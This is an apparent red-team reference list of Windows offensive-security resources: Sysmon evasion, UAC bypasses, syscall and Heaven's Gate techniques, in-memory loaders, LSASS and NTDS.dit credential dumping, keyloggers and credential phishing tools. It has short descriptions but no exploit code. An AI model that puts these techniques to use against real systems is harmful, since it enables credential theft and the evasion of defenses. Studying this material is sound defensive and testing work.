Isolated to Constrained Language Mode - Living within the Confines - Christopher Truncer(BSidesDC2018)
- Tools
-
Articles/Blogposts/Writeups
-
Sysmon
-
Articles/Blogposts/Writeups
- Sysmon Enumeration Overview - @./pwn(2017)
- Sysmon doing lines - hexacorn(2017)
- Sysmon doing lines, part 3 - hexacorn(2018)
- Sysmon doing lines, part 4 - hexacorn(2018)
- Operating Offensively Against Sysmon - Carlos Perez(2018)
- Subverting Sysmon: Application of a Formalized Security Product Evasion Methodology - Matt Graber(BlackHatUSA2018)
- Subverting Sysmon materials
- Evading Sysmon DNS Monitoring - Adam Chester(2019)
- Sysmon Image File Name Evasion - NtRaiseHardError(2020)
- Sysmon Internals - From File Delete Event to Kernel Code Execution - NtRaiseHardError(2020)
- Talks/Presentations/Videos
-
Tools
- Shhmon - Neuter Sysmon by unloading its driver
-
Sysmon configuration bypass finder
- Detect possible sysmon logging bypasses given a specific configuration
-
Articles/Blogposts/Writeups
-
System Calls
- 101
- Articles/Blogposts/Writeups
- Talks/Presentations/Videos
-
Tools
-
SysWhispers
- SysWhispers helps with evasion by generating header/ASM files implants can use to make direct system calls.
-
SysWhispers
-
Windows User Account Control(UAC)
-
101
- User Account Control - docs.ms
- User Account Control Step-by-Step Guide - docs.ms
- User Account Control - Steven Sinofsky(blogs.msdn)](https://blogs.msdn.microsoft.com/e7/2008/10/08/user-account-control/)
- Inside Windows Vista User Account Control - docs.ms
- User Account Control: Inside Windows 7 User Account Control - Mark Russinovich(2016)
- User Account Control – What Penetration Testers Should Know - cobalstrike.com
-
Articles/Blogposts/Writeups
- Anatomy of UAC Attacks - b33f
- Reading Your Way Around UAC (Part 1) - James Forshaw(2017)
- Farewell to the Token Stealing UAC Bypass - James Forshaw(2018)
-
CQLabs – How UAC bypass methods really work - Adrian Denkiewicz(2020)
- In this article, we will analyze a couple of knowns, still working, UAC bypasses – how they work, what are the requirements, and potential mitigation techniques. Before we dive into this, we need to briefly explain what UAC is.
- UACMe 3.5, WD and the ways of mitigation - hfiref0x(2020)
- UAC bypasses from COMAutoApprovalList - hfiref0x(2020)
-
Talks/Presentations/Videos
-
Not a Security Boundary: Bypassing User Account Control - Matt Nelson(Derbycon2017)
- Microsoft's User Account Control feature, introduced in Windows Vista, has been a topic of interest to many in the security community. Since UAC was designed to force user approval for administrative actions, attackers (and red teamers) encounter UAC on nearly every engagement. As a result, bypassing this control is a task that an actor often has to overcome, despite its lack of formal designation as a security boundary. This talk highlights what UAC is, previous work by others, research methodology, and details several technical UAC bypasses developed by the author.
- FromALPC to UAC-Bypass - @hakril(2017)
-
Not a Security Boundary: Bypassing User Account Control - Matt Nelson(Derbycon2017)
-
Papers
-
Testing UAC on Windows 10 - Ernesto Fernandez(2017)
- User Account Control (UAC) is a mechanism implemented in Windows systems from Vista to prevent malicious software from executing with administrative privileges without user consent. However, this mechanism does not provide a secure solution to that problem, since can be easily bypassed in some ways, something we will show by means of different methods such as DLL hijacking, token impersonation or COM interface elevation, also we will show a new method which we have developed based on a previous one. Moreover, this new Proof of Concept has been ported to the Metasploit Framework as a new module, which indeed is the only UAC bypass module that works in the latest Windows 10 build version.
-
Testing UAC on Windows 10 - Ernesto Fernandez(2017)
-
Bypasses
- Fileless UAC Bypass in Windows Store Binary - Activecyber.us(2019)
- UAC Bypass via SPPLUAObject Class
-
ALPC-BypassUAC
- UAC Bypass with mmc via alpc
- Bypassing Windows User Account Control (UAC) and ways of mitigation - Parvez(2014)
- Bypassing User Account Control (UAC) using TpmInit.exe - uacmeltdown.blogspot
- UAC Bypass in System Reset Binary via DLL Hijacking - activecyber.us
- Bypassing UAC on Windows 10 using Disk Cleanup
-
Research on CMSTP.exe
- Methods to bypass UAC and load a DLL over webdav
- Bypassing UAC using App Paths - enigma0x3(2017)
- “Fileless” UAC Bypass Using eventvwr.exe and Registry Hijacking
- Fileless UAC Bypass using sdclt
- Eventvwr File-less UAC Bypass CNA - @vysecurity.(2016)
- UAC Bypass or a Story of Three Elevations - xi-tauw(2017)
- How to bypass UAC in newer Windows versions - zcool(Oct2018)
- Fileless UAC Bypass in Windows Store Binary - activecyber.us
- User Account Control & odbcad32.exe - secureyourit.co.uk
- More Than a Penetration Test (Microsoft Windows CVE-2019–1082) - Michal Bazyli(2019)
- UAC bypass through Trusted Folder abuse - Jean Maes(2020)
- Talks & Presentations
-
Tools
-
UACME
- Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.
-
DccwBypassUAC
- This exploit abuses the way "WinSxS" is managed by "dccw.exe" by means of a derivative Leo's Davidson "Bypass UAC" method so as to obtain an administrator shell without prompting for consent. It supports "x86" and "x64" architectures. Moreover, it has been successfully tested on Windows 8.1 9600, Windows 10 14393, Windows 10 15031 and Windows 10 15062.
-
Bypass-UAC
- Bypass-UAC provides a framework to perform UAC bypasses based on auto elevating IFileOperation COM object method calls. This is not a new technique, traditionally, this is accomplished by injecting a DLL into "explorer.exe". This is not desirable because injecting into explorer may trigger security alerts and working with unmanaged DLL's makes for an inflexible work-flow. To get around this, Bypass-UAC implements a function which rewrites PowerShell's PEB to give it the appearance of "explorer.exe". This provides the same effect because COM objects exclusively rely on Windows's Process Status API (PSAPI) which reads the process PEB.
- Fileless_UAC_bypass_WSReset
-
ByeIntegrity — Windows UAC Bypass
- Bypass UAC by hijacking a DLL located in the Native Image Cache
-
ByeIntegrity 2.0 — Windows UAC Bypass
- Bypass UAC by abusing the Internet Explorer Add-on installer
-
ByeIntegrity 3.0 — Windows UAC Bypass
- Bypass UAC by abusing the Security Center CPL and hijacking a shell protocol handler
-
UACME
-
101
-
Specific Techniques
-
CMD Obfuscation
- Articles/Blogposts/Writeups
-
Talks/Presentations/Videos
-
Invoke-DOSfuscation: Techniques FOR %F IN (-style) DO (S-level CMD Obfuscation) - Daniel Bohannon(Derbycon2018)
- Skilled attackers continually seek out new attack vectors and effective ways of obfuscating old techniques to evade detection. Active defenders can attest to attackers’ prolific obfuscation of JavaScript, VBScript and PowerShell payloads given the ample availability of obfuscation frameworks and their effectiveness at evading many of today’s defenses. However, advanced defenders are increasingly detecting this obfuscation with help from the data science community. This approach paired with deeper visibility into memory-resident payloads via interfaces like Microsoft’s Antimalware Scan Interface (AMSI) is causing some Red Teamers to shift tradecraft to languages that offer defenders less visibility. But what are attackers using in the wild? In the past year numerous APT and FIN (Financial) threat actors have increasingly introduced obfuscation techniques into their usage of native Windows binaries like wscript.exe, regsvr32.exe and cmd.exe. Some simple approaches entail randomly adding cmd.exe’s caret (^) escape character to command arguments. More interesting techniques like those employed by APT32, FIN7 and FIN8 involve quotes, parentheses and standard input.The most interesting obfuscation technique observed in the wild was FIN7’s use of cmd.exe’s string replacement functionality identified in June 2017. This discovery single-handedly initiated my research into cmd.exe’s surprisingly effective but vastly unexplored obfuscation capabilities. In this presentation I will dive deep into cmd.exe’s multi-faceted obfuscation opportunities beginning with carets, quotes and stdin argument hiding. Next I will extrapolate more complex techniques including FIN7’s string removal/replacement concept and two never-before-seen obfuscation and full encoding techniques - all performed entirely in memory by cmd.exe. Finally, I will outline three approaches for obfuscating binary names from static and dynamic analysis while highlighting lesser-known cmd.exe replacement binaries. I will conclude this talk by giving a live demo of my cmd.exe obfuscation framework called Invoke-DOSfuscation that obfuscates payloads using these multi-layered techniques. I will also share detection implications and approaches for this genre of obfuscation.
-
Invoke-DOSfuscation: Techniques FOR %F IN (-style) DO (S-level CMD Obfuscation) - Daniel Bohannon(Derbycon2018)
- Tools
-
Debuggers
-
Batch, attach and patch: using windbg’s local kernel debugger to execute code in windows kernel
- In this article I am going to describe a way to execute code in windows kernel by using windbg local kernel debugging. It’s not a vulnerability, I am going to use only windbg’s legal functionality, and I am going to use only a batch file (not powershell, or vbs, an old style batch only) and some Microsoft’s signed executables (some of them that are already in the system and windbg, that we will be dumped from the batch file). With this method it is not necessary to launch executables at user mode (only Microsoft signed executables) or load signed drivers. PatchGuard and other protections don’t stop us. We put our code directly into kernel memory space and we hook some point to get a thread executing it. As we will demonstrate, a malware consisting of a simple batch file would be able to jump to kernel, enabling local kernel debugging and using windbg to get its code being executed in kernel.
-
Batch, attach and patch: using windbg’s local kernel debugger to execute code in windows kernel
-
He*
's Gate Heaven's Gate * 101 * Ten years later, malware authors are still abusing 'Heaven's Gate' technique - Catalin Cimpanu (2019) * Heaven's Gate: 64-bit code in 32-bit file - defjam(2011) * Knockin’ on Heaven’s Gate – Dynamic Processor Mode Switching - George Nicolaou(2012) * This post presents the research conducted under the domain of dynamic processor mode (or context) switching that takes place prior to the invocation of kernel mode functions in 32bit processes running under a 64bit Windows kernel. Processes that are designed and compiled to execute under a 32bit environment get loaded inside the Windows-on-Windows64 ( WoW64 ) subsystem and are assigned threads running in IA-32e compatibility mode ( 32bit mode ). When a kernel request is being made through the standard WoW64 libraries, at some point, the thread switches to 64bit mode, the request is executed, the thread switches back to compatibility mode and execution is passed back to the caller. The switch from 32bit compatibility mode to 64bit mode is made through a specific segment call gate referred to as the Heaven’s Gate, thus the title of this topic. All threads executing under the WoW64 environment can execute a FAR CALL through this segment gate and switch to the 64bit mode. The feature of mode switch can also be viewed from the security and maliciousness point of view. It can be used as an anti reverse engineering technique for protecting software up to the malicious ( or not ) intends of cross process generic library injection or antivirus and sandbox evasion. The result of this research is a library named W64oWoW64 which stands for Windows64 On Windows On Windows64. * Rise of the dual architecture usermode rootkit - MalwareTech(2013) * The 0x33 Segment Selector (Heavens Gate) - MalwareTech(2014) * Articles/Blogposts/Writeups * Code obFU(N)scation mixing 32 and 64 bit mode instructions - giula * Closing “Heaven’s Gate” - Alex Ionescu(2015) * Crowbar: Breaking through Heaven’s Gate - KrabsOnSecurity * Heaven's Gate: 64-bit code in 32-bit file - roy_g_biv(2009) * The power of WOW64 - int0h(2009) * Anti-Anti-Debugging via WOW64 - int0h(2011) * DLL Injection and WoW64 - Corsix.org(2010) * Mixing x86 with x64 code - ReWolf(2011) * Heaven’s gate and a chameleon code (x86/64) - Hexacorn(2015) * Jumping into heaven’s gate - Yarden Shafir(2018) * Hooking Heaven’s Gate — a WOW64 hooking technique - Hoang Bui(2019) * How to Hook 64-Bit Code from WOW64 32-Bit Mode - Ruslan Valiakhmetov(2020) * Deep Hooks: Monitoring native execution in WoW64 applications – Part 1 - Yarden Shafir, Assaf Carlsbad(2018) * Part 2 * Part 3 * A Pony Hidden in Your Secret Garden - David Cohen(2019) * Pony is the name of the malware * VB2019 paper: Exploring Emotet, an elaborate everyday enigma - Luca Nagy(2019) * Based on Sophos detection numbers, the Emotet trojan is the most widespread malware family in the wild. Since its appearance more than five years ago, it has been – and remains – the most notorious and costly active malware. Emotet owes its reputation to its constant state of evolution and change. The malware’s rapid advancement helps support its highly sophisticated operation. This paper will discuss the reverse engineering of its components, as well as the capabilities and features of Emotet: a detailed overview of its multi-layered operation, starting with the spam lure, the malicious attachments (and their evolution), and the malware executable itself, from its highly sophisticated packer to its C2 server communications. * WoW64 internals ...re-discovering Heaven's Gate on ARM * "Heaven’s Gate" Một kĩ thuật cũ nhưng hiệu quả - Tran Trung Kien(2020) * How to Hook 64-Bit Code from WOW64 32-Bit Mode It was originally published on https://www.apriorit.com/ - apriorit.com(2020) * GuLoader: Peering Into a Shellcode-based Downloader - Umesh Wanve(2020) * Talks/Presentations/Videos * DEEP Hooks: Monitoring Native Execution In WOW64 Applications - Assaf Carlsbad, Yarden Shafir(2018) * Tools * Heavens-Gate-2.0 * "Unable to find any properly implemented/working code that works on Windows 10, I have decided to open the Heaven's Gate on my own. Yes, this one is working on an updated Windows 10 (as of 22th July 2017) Tested on Windows 7 too" * HeavenInjector * Simple proof of concept code for injecting libraries on 64bit processes from a 32bit process * rewolf-wow64ext * Helper library for x86 programs that runs under WOW64 layer on x64 versions of Microsoft Windows operating systems. It enables x86 applications to read, write and enumerate memory of a native x64 applications. There is also possibility to call any x64 function from 64-bits version of NTDLL through a special function called X64Call(). As a bonus, wow64ext.h contains definitions of some structures that might be useful for programs that want to access PEB, TEB, TIB etc. * W64oWoW64 * wow64pp * An easy to use header only heavens gate implementation based on wow64ext X64Call however not using inline assembly allowing it to work on other compilers like MinGW.-
Hell's Gate
-
101
-
Hells Gate - smelly__vx(@RtlMateusz), am0nsec(@am0nsec)
- "However, we are happy to report that we havelifted the veil, we have identified an approach capable of programmatically aggregating syscalls, at run-time, shedding us of unnecessary dependencies. For the sake of brevity, this paper will primarily focus on dynamically retrieving syscalls. This paperassumes you possess knowledge pertaining to both Windows internals and the Windows PE file format."
-
Hells Gate - smelly__vx(@RtlMateusz), am0nsec(@am0nsec)
-
Articles/Blogposts/Writeups
- Implementing Direct Syscalls Using Hell’s Gate - N4kedTurtle(2020)
- Reading memory of x64 process from x86 process - ReWolf(2012)
- wow64ext library update - ReWolf(2012)
- WoW64 internals: Tale of GetSystemFileCacheSize - ReWolf(2013)
- wow64ext finally compatible with Windows 8 - ReWolf(2013)
- WoW64 internals: Unexpected behaviour of NtQueryDirectoryObject - ReWolf(2015)
-
Tools
-
Hell's Gate
- Original C Implementation of the Hell's Gate VX Technique
- HellsGatePoC
-
C# Hell's Gate
- C# Implementation of the Hell's Gate VX Technique
- BananaPhone
-
Hell's Gate
-
101
-
Heresy's Gate
- Articles/Blogposts/Writeups
- Tools
-
Hell's Gate
-
In-Memory Execution
-
*
Injection
-
-
Loading-after-execution
-
Tools
-
foolavc
- This project is foolav continuation. Original foolav was offered only as x86 executable, used single encoding for externally kept payload file. Once foolav is executed, payload is loaded into memory and executed as a shellcode in separate thread. foolavc on the other hand supports both x86 and x86_64 architectures, allows use of both internal (built-in) or external payloads. Those can be interpreted in one of three ways: shellcode, DLL and EXEcutable.
-
MemoryModule
- MemoryModule is a library that can be used to load a DLL completely from memory - without storing on the disk first.
-
foolavc
-
Tools
-
Native Binaries/Functionality
-
Research on CMSTP.exe
- Methods to bypass UAC and load a DLL over webdav
- rundll32 lockdown testing goodness
- Hack Microsoft Using Microsoft Signed Binaries - Pierre-Alexandre Braeken
-
Hack Microsoft Using Microsoft Signed Binaries - BH17 - pierre - alexandre braeken
- Imagine being attacked by legitimate software tools that cannot be detected by usual defender tools. How bad could it be to be attacked by malicious threat actors only sending bytes to be read and bytes to be written in order to achieve advanced attacks? The most dangerous threat is the one you can’t see. At a time when it is not obvious to detect memory attacks using API like VirtualAlloc, what would be worse than having to detect something like
f0xffffe0010c79ebe8+0x8 L4 0xe8 0xcb 0x04 0x10
? We will be able to demonstrate that we can achieve every kind of attacks you can imagine using only PowerShell and a Microsoft Signed Debugger. We can retrieve passwords from the userland memory, execute shellcode by dynamically parsing loaded PE or attack the kernel achieving advanced persistence inside any system.
- Imagine being attacked by legitimate software tools that cannot be detected by usual defender tools. How bad could it be to be attacked by malicious threat actors only sending bytes to be read and bytes to be written in order to achieve advanced attacks? The most dangerous threat is the one you can’t see. At a time when it is not obvious to detect memory attacks using API like VirtualAlloc, what would be worse than having to detect something like
-
RogueMMC
- Execute Shellcode And Other Goodies From MMC
-
Research on CMSTP.exe
-
Path Obfuscation
-
DOS File Path Magic Tricks - Carrie Roberts(2020)
- In this article I give a variety of examples of how to refer to the notepad.exe executable from the C:\Windows\System32 directory using various path notations. I also discuss how some of these tricks can be used to annoy or fool system administrators and information security analysts.
-
DOS File Path Magic Tricks - Carrie Roberts(2020)
-
Polymorphism
- 101
- Articles/Blogposts/Writeups
-
Talks/Presentations/Videos
-
Antivirus Evasion through Antigenic Variation (Why the Blacklisting Approach to AV is Broken) - Trenton Ivey, Neal Bridges(Derbycon 2013)
- Description: Think of the last time you got sick. Your immune system is an amazing piece of machinery, but every now and then, something gets past it. Antivirus evasion techniques can become more effective when modeled after infectious diseases. This talk highlights many of the antivirus evasion techniques in use today. Going further, this talk shows how genetic algorithms can quickly and repeatedly “evolve” code to evade many malicious code detection techniques in use today.
-
Antivirus Evasion through Antigenic Variation (Why the Blacklisting Approach to AV is Broken) - Trenton Ivey, Neal Bridges(Derbycon 2013)
- Papers
-
Tools
-
Enneos
- Evolutionary Neural Network Encoder of Shenanigans. Obfuscating shellcode with an encoder that uses genetic algorithms to evolve neural networks to contain and output the shellcode on demand.
-
MorphAES
- MorphAES is the world's first polymorphic shellcode engine, with metamorphic properties and capability to bypass sandboxes, which makes it undetectable for an IDPS, it's cross-platform as well and library-independent.
-
Enneos
- Process-Argument Spoofing
- Process Un-Linking
-
Process 'Hardening'
- D/Invokify PPID Spoofy & BlockDLLs - RastaMouse(2020)
- Hiding Process Memory via Anti Forensic Techniques - Ralph Palutke, Frank Block, Patrick Reichenberger, Dominik Stripeika(DFRWS USA2020)
-
Bypassing VirtualBox Process Hardening on Windows - James Forshaw(2017)
- This blog post will describe the implementation of Oracle’s VirtualBox protected process and detail three different, but now fixed, ways of bypassing the protection and injecting arbitrary code into the process. The techniques I’ll present can equally be applied to similar implementations of “protected” processes in other applications.)
- REPL
-
Sandbox Detection & Evasion
- Articles/Writeups
- Tools
- Signatures
-
CMD Obfuscation
-
101
-
Credential Access
-
101
-
An Overview of KB2871997 - msrc-blog.ms
- Increasing complexity of retrieving clear-text creds
-
Cached and Stored Credentials Technical Overview - docs.ms(2016)
- Applies To: Windows Vista, Windows Server 2008, Windows 7, Windows 8.1, Windows Server 2008 R2, Windows Server 2012 R2, Windows Server 2012, Windows 8
- Cached and Stored Credentials - ldapwiki
-
Windows Credential Management, Logon Sessions and the Double Hop Problem - Acebond(2019)
- "I wanted to provide a quick overview on Windows credential management in relation to penetration testing, why passwords are not always stored in memory and the Double Hop problem."
-
An Overview of KB2871997 - msrc-blog.ms
-
Articles/Blogposts/Writeups
-
Collection/Overview of techniques
- Dump Windows password hashes efficiently - Part 1(2011)
- Dumping user passwords in plaintext on Windows 8.1 and Server 2012 - labofapenetrationtester
- Intercepting Password Changes With Function Hooking - clymb3r(2013)
- Dumping Windows Credentials
- Hunting for Credentials Dumping in Windows Environment - Teymur Kheirhabarov - ZeroNights(2017)
- Dumping Clear-Text Credentials - NetbiosX(2018)
- Dump-Clear-Text-Password-after-KB2871997-installed - 3gstudent
- Extracting credentials from a remote Windows system - Living off the Land - bitsadmin.in(2020)
- Where we can find different kinds of passwords in the operating system? - Paula Januszkiewicz(2020)
-
MITRE ATT&CK T1003 Credential Dumping - Süleyman Özarslan(2020)
- In this article, we review: the fundamentals of the credential dumping technique; resources targeted by adversaries for credential dumping; its use cases by threat actors and malware; the most used OS resources for credential dumping; 11 red team exercises for this technique
-
DMA
-
The True Story of Windows 10 and the DMA-protection - Sami Laiho
- This blog post will tell you if / how Windows 10 protects against DMA (Direct Memory Access) bases attacks used against BitLocker and other encryption mechanisms by stealing the encryption key from the memory of a running computer. The story might be long(ish) but rest assured you want to read it through.
-
The True Story of Windows 10 and the DMA-protection - Sami Laiho
- From a Memory Dump
-
Specific Programs
- SecretsDump Demystified - Mike Benich(2020)
-
Password Managers: Under the Hood of Secrets Management - ISE
- Password managers allow the storage and retrieval of sensitive information from an encrypted database. Users rely on them to provide better security guarantees against trivial exfiltration than alternative ways of storing passwords, such as an unsecured flat text file. In this paper we propose security guarantees password managers should offer and examine the underlying workings of five popular password managers targeting the Windows 10 platform: 1Password 7, 1Password 4, Dashlane, KeePass, and LastPass. We anticipated that password managers would employ basic security best practices, such as scrubbing secrets from memory when they are not in use and sanitization of memory once a password manager was logged out and placed into a locked state. However, we found that in all password managers we examined, trivial secrets extraction was possible from a locked password manager, including the master password in some cases, exposing up to 60 million users that use the password managers in this study to secrets retrieval from an assumed secure locked state.
-
Collection/Overview of techniques
-
3rd Party
- PulseSecure
- Solarwinds Orion
- SolarFlare Release: Password Dumper for SolarWinds Orion - mubix(2020)
-
solarflare
- Credential Dumping Tool for SolarWinds Orion
-
Active Directory Environment
-
Articles/Blogposts/Writeups
- Dumping Domain Password Hashes - pentestlab.blog
- How Attackers Dump Active Directory Database Credentials - adsecurity.org
- Compromising Plain Text Passwords In Active Directory
- Safely Dumping Domain Hashes, with Meterpreter - Rapid7
-
Active Directory Domain Services Database Mounting Tool (Snapshot Viewer or Snapshot Browser) Step-by-Step Guide
- This guide shows how you can use an improved version of Ntdsutil and a new Active Directory® database mounting tool in Windows Server® 2008 to create and view snapshots of data that is stored in Active Directory Domain Services (AD DS) or Active Directory Lightweight Directory Services (AD LDS), without restarting the domain controller or AD LDS server. A snapshot is a shadow copy—created by the Volume Shadow Copy Service (VSS)—of the volumes that contain the Active Directory database and log files.
-
Articles/Blogposts/Writeups
-
AWS
- Articles/Blogposts/Writeups
-
AutoLogon
-
Tools
-
DecryptAutoLogon
- Command line tool to extract/decrypt the password that was stored in the LSA by SysInternals AutoLogon
-
DecryptAutoLogon
-
Tools
-
Azure
-
Articles/Blogposts/Writeups
-
PowerShell, Azure, and Password Hashes in 4 steps - FortyNorth Security
- this blog post will walk you through the process of obtaining hashes from a domain controller within Azure using PowerShell.
-
PowerShell, Azure, and Password Hashes in 4 steps - FortyNorth Security
-
Articles/Blogposts/Writeups
- Clipboard
- CredSSP
-
DPAPI
-
TBAL: an (accidental?) DPAPI Backdoor for local users a.k.a how a convenience feature undermined a security feature - vztekoverflow(2018)
- In this article, we have demonstrated that in some scenarios, the default Windows configuration leads to the SHA‑1 hash of the user’s password being stored to the disk in a way that is retrievable without any further knowledge about the password. We argue that this is an issue for DPAPI, because if the secret necessary for decrypting the master key was to be stored on the disk by design, Microsoft could have kept on using the NTLM hash it uses in domain settings (and supposedly used in the first implementation of DPAPI). We then demonstrated how this attack can be executed using readily available tools.
-
TBAL: an (accidental?) DPAPI Backdoor for local users a.k.a how a convenience feature undermined a security feature - vztekoverflow(2018)
-
Dumping Credential Manager
-
Invoke-WCMDump
- PowerShell Script to Dump Windows Credentials from the Credential Manager
-
Invoke-WCMDump
-
Dumping NTDS.dit
-
Articles/Blogposts/Writeups
- How Attackers Pull the Active Directory Database (NTDS.dit) from a Domain Controller
- Extracting Password Hashes From The Ntds.dit File
- Obtaining NTDS.Dit Using In-Built Windows Commands - Cyberis(2014)
- Volume Shadow Copy NTDS.dit Domain Hashes Remotely - Part 1 - mubix
- Getting Hashes from NTDS.dit File - swordshield.com
- Extracting Hashes and Domain Info From ntds.dit - ropnop
- Practice ntds.dit File Part 2: Extracting Hashes - Didier Stevens
-
Tools
- adXtract
-
DIT Snapshot Viewer
- DIT Snapshot Viewer is an inspection tool for Active Directory database, ntds.dit. This tool connects to ESE (Extensible Storage Engine) and reads tables/records including hidden objects by low level C API. The tool can extract ntds.dit file without stopping lsass.exe. When Active Directory Service is running, lsass.exe locks the file and does not allow to access to it. The snapshot wizard copies ntds.dit using VSS (Volume Shadow Copy Service) even if the file is exclusively locked. As copying ntds.dit may cause data inconsistency in ESE DB, the wizard automatically runs esentutil /repair command to fix the inconsistency.
-
NTDSXtract - Active Directory Forensics Framework
- This framework was developed by the author in order to provide the community with a solution to extract forensically important information from the main database of Microsoft Active Directory (NTDS.DIT).
-
NTDSDumpEx
- NTDS.dit offline dumper with non-elevated
-
NTDS-Extraction-Tools
- Automated scripts that use an older version of libesedb (2014-04-06) to extract large NTDS.dit files
-
gosecretsdump
- This is a conversion of the impacket secretsdump module into golang. It's not very good, but it is quite fast. Please let me know if you find bugs, I'll try and fix where I can - bonus points if you can provide sample .dit files for me to bash against.
-
Articles/Blogposts/Writeups
-
Dumping Process Memory
-
101
-
MiniDumpWriteDump function - docs.ms
- Writes user-mode minidump information to the specified file.
- MiniDumpWriteDump function (minidumpapiset.h) - docs.ms
- minidump.c File Reference - ReactOS
-
Why is SeDebugPrivilege enabled in PowerShell? - Lee Holmes(2017)
- This is enabled by .NET when PowerShell uses the System.Diagnostics.Process class in .NET, which it does for many reasons. One example is the Get-Process cmdlet. Another example is the method it invokes to get the current process PID for the $pid variable. Any .NET application that uses the System.Diagnostics.Process class also enables this privilege.
-
MiniDumpWriteDump function - docs.ms
-
Articles/Blogpost/Writeups
- MiniDumpWriteDump via COM+ Services DLL - modexp(2019)
- Dumping Process Memory with Custom C# Code - 3xpl01tc0d3r(2019)
-
SassyKitdi: Kernel Mode TCP Sockets + LSASS Dump - @zerosum0x0(2020)
- This post describes a kernel mode payload for Windows NT called "SassyKitdi" (LSASS + Rootkit + TDI). This payload is of a nature that can be deployed via remote kernel exploits such as EternalBlue, BlueKeep, and SMBGhost, as well as from local kernel exploits, i.e. bad drivers.
- How to Capture a Minidump: Let Me Count the Ways - John Robbins(2020)
-
Tools
-
KsDumper
- Dumping processes using the power of kernel space!
-
PyKDumper
- PykDumper is mimimkatz inspired PyKD based script that retrieves and decrypt usernames,logonservers and credentials from the lsass process.
-
SassyKitdi
- Kernel Mode TCP Sockets + LSASS Dump (Rust Shellcode)
-
KsDumper
-
101
-
Internal Monologue
-
101
-
Internal Monologue Attack: Retrieving NTLM Hashes without Touching LSASS
- In secure environments, where Mimikatz should not be executed, an adversary can perform an Internal Monologue Attack, in which they invoke a local procedure call to the NTLM authentication package (MSV1_0) from a user-mode application through SSPI to calculate a NetNTLM response in the context of the logged on user, after performing an extended NetNTLM downgrade.
-
Internal Monologue Attack: Retrieving NTLM Hashes without Touching LSASS
- Articles/Blogposts/Writeups
-
Tools
-
selfhash
- Selfhash allows you to get password hashes of the current user. This tool doesn't requere high privileges i.e. SYSTEM, but on another hand it returns NTLM Challenge Response, so you could crack it later.
-
selfhash
-
101
-
Keylogger
- Articles/Blogpost/Writeups
-
Papers
-
You Can Type, but You Can’t Hide: A Stealthy GPU-based Keylogger
- Keyloggers are a prominent class of malware that harvests sensitive data by recording any typed in information. Key- logger implementations strive to hide their presence using rootkit-like techniques to evade detection by antivirus and other system protections. In this paper, we present a new approach for implementing a stealthy keylogger: we explore the possibility of leveraging the graphics card as an alterna- tive environment for hosting the operation of a keylogger. The key idea behind our approach is to monitor the system’s keyboard buffer directly from the GPU via DMA, without any hooks or modifications in the kernel’s code and data structures besides the page table. The evaluation of our pro- totype implementation shows that a GPU-based keylogger can effectively record all user keystrokes, store them in the memory space of the GPU, and even analyze the recorded data in-place, with negligible runtime overhead.
-
You Can Type, but You Can’t Hide: A Stealthy GPU-based Keylogger
-
Tools
-
Puffadder
- Puffader is an opensource, hidden and undetectable keylogger for windows written in Python 2.7 which can also capture screenshots, mouse window clicks and clipboard data.
-
Puffadder
-
Local Account
-
Win Brute Logon (Proof Of Concept)
- Crack any Microsoft Windows users password without any privilege (Guest account included)
-
Win Brute Logon (Proof Of Concept)
-
Local Phishing
- Articles/Blogposts/Writeups
-
Tools
-
Pickl3
- Pickl3 is Windows active user credential phishing tool. You can execute the Pickl3 and phish the target user credential.
-
Pickl3
-
Logon
-
Capturing Windows 7 Credentials at Logon Using Custom Credential Provider
- The quick lowdown: I wrote a DLL capable of logging the credentials entered at logon for Windows Vista, 7 and future versions which you can download at http://www.leetsys.com/programs/credentialprovider/cp.zip. The credentials are logged to a file located at c:\cplog.txt. Simply copy the dll to the system32 directory and run the included register.reg script to create the necessary registry settings.
-
Capturing Windows 7 Credentials at Logon Using Custom Credential Provider
-
Local Files
- Articles/Blogposts/Writeups
-
Tools
-
windows_sshagent_extract
- PoC code to extract private keys from Windows 10's built in ssh-agent service
-
windows_sshagent_extract
-
Local Security Authority Subsystem Service(LSA & LSASS)
- 101
-
Articles/Blogposts/Writeups
- Windows LSA secrets - passcape.com
- Dumping LSA Secrets - @spottheplanet(2019)
- Dumping Lsass.exe to Disk Without Mimikatz and Extracting Credentials - @spotheplanet
- Some ways to dump LSASS.exe - Mark Mo
- Extract credentials from lsass remotely - hackndo
- Bypassing SACL Auditing on LSASS - James Forshaw(2017)
- Hidden Gems in Windows: The Hunt is On - Nate Caroe(2019)
- Bypassing LSA Protection (aka Protected Process Light) without Mimikatz on Windows 10 - RedCursor.com.au(2020)
- Dumping LSASS without Mimikatz with MiniDumpWriteDump == Reduced Chances of Getting Flagged by AVs - @spotheplanet
- Protecting the LSASS.EXE process with RunAsPPL - adamcouch.co.uk
- Credential Dumping: Local Security Authority (LSA|LSASS.EXE) - Yashika Dhir(2020)
-
Tools
-
Dumpert
- Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike, while not touching disk and evading AV/EDR monitored user-mode API calls.
-
AndrewSpecial
- AndrewSpecial, dumping lsass' memory stealthily and bypassing "Cilence" since 2019.
-
PhysMem2Profit
- Physmem2profit can be used to create a minidump of a target host's LSASS process by analysing physical memory remotely. The intention of this research is to propose an alternative approach to credential theft and create a modular framework that can be extended to support other drivers that can access physical memory. Physmem2profit generates a minidump (.dmp) of LSASS that can be further analyzed with Mimikatz. The tool does not require Cobalt Strike but should work fine over beacon with a SOCKS proxy.
- Blogpost
- Talk
-
lsassy
- Python library to remotely extract credentials on a set of hosts
- Blogpost
-
SharpMiniDump
- Create a minidump of the LSASS process from memory (Windows 10 - Windows Server 2016). The entire process uses: dynamic API calls, direct syscall and Native API unhooking to evade the AV / EDR detection.
-
PPLKiller
- Tool to bypass LSA Protection (aka Protected Process Light) I’ve noticed there is a common misconception that LSA Protection prevents attacks that leverage SeDebug or Administrative privileges to extract credential material from memory, like Mimikatz. LSA Protection does NOT protect from these attacks, at best it makes them slightly more difficult as an extra step needs to be performed.
- Bypassing LSA Protection (aka Protected Process Light) without Mimikatz on Windows 10 - Acebond(2020)
-
Spraykatz
- Spraykatz is a tool without any pretention able to retrieve credentials on Windows machines and large Active Directory environments. It simply tries to procdump machines and parse dumps remotely in order to avoid detections by antivirus softwares as much as possible.
-
SharpKatz
- Porting of mimikatz sekurlsa::logonpasswords, sekurlsa::ekeys and lsadump::dcsync commands
-
SharpSecDump
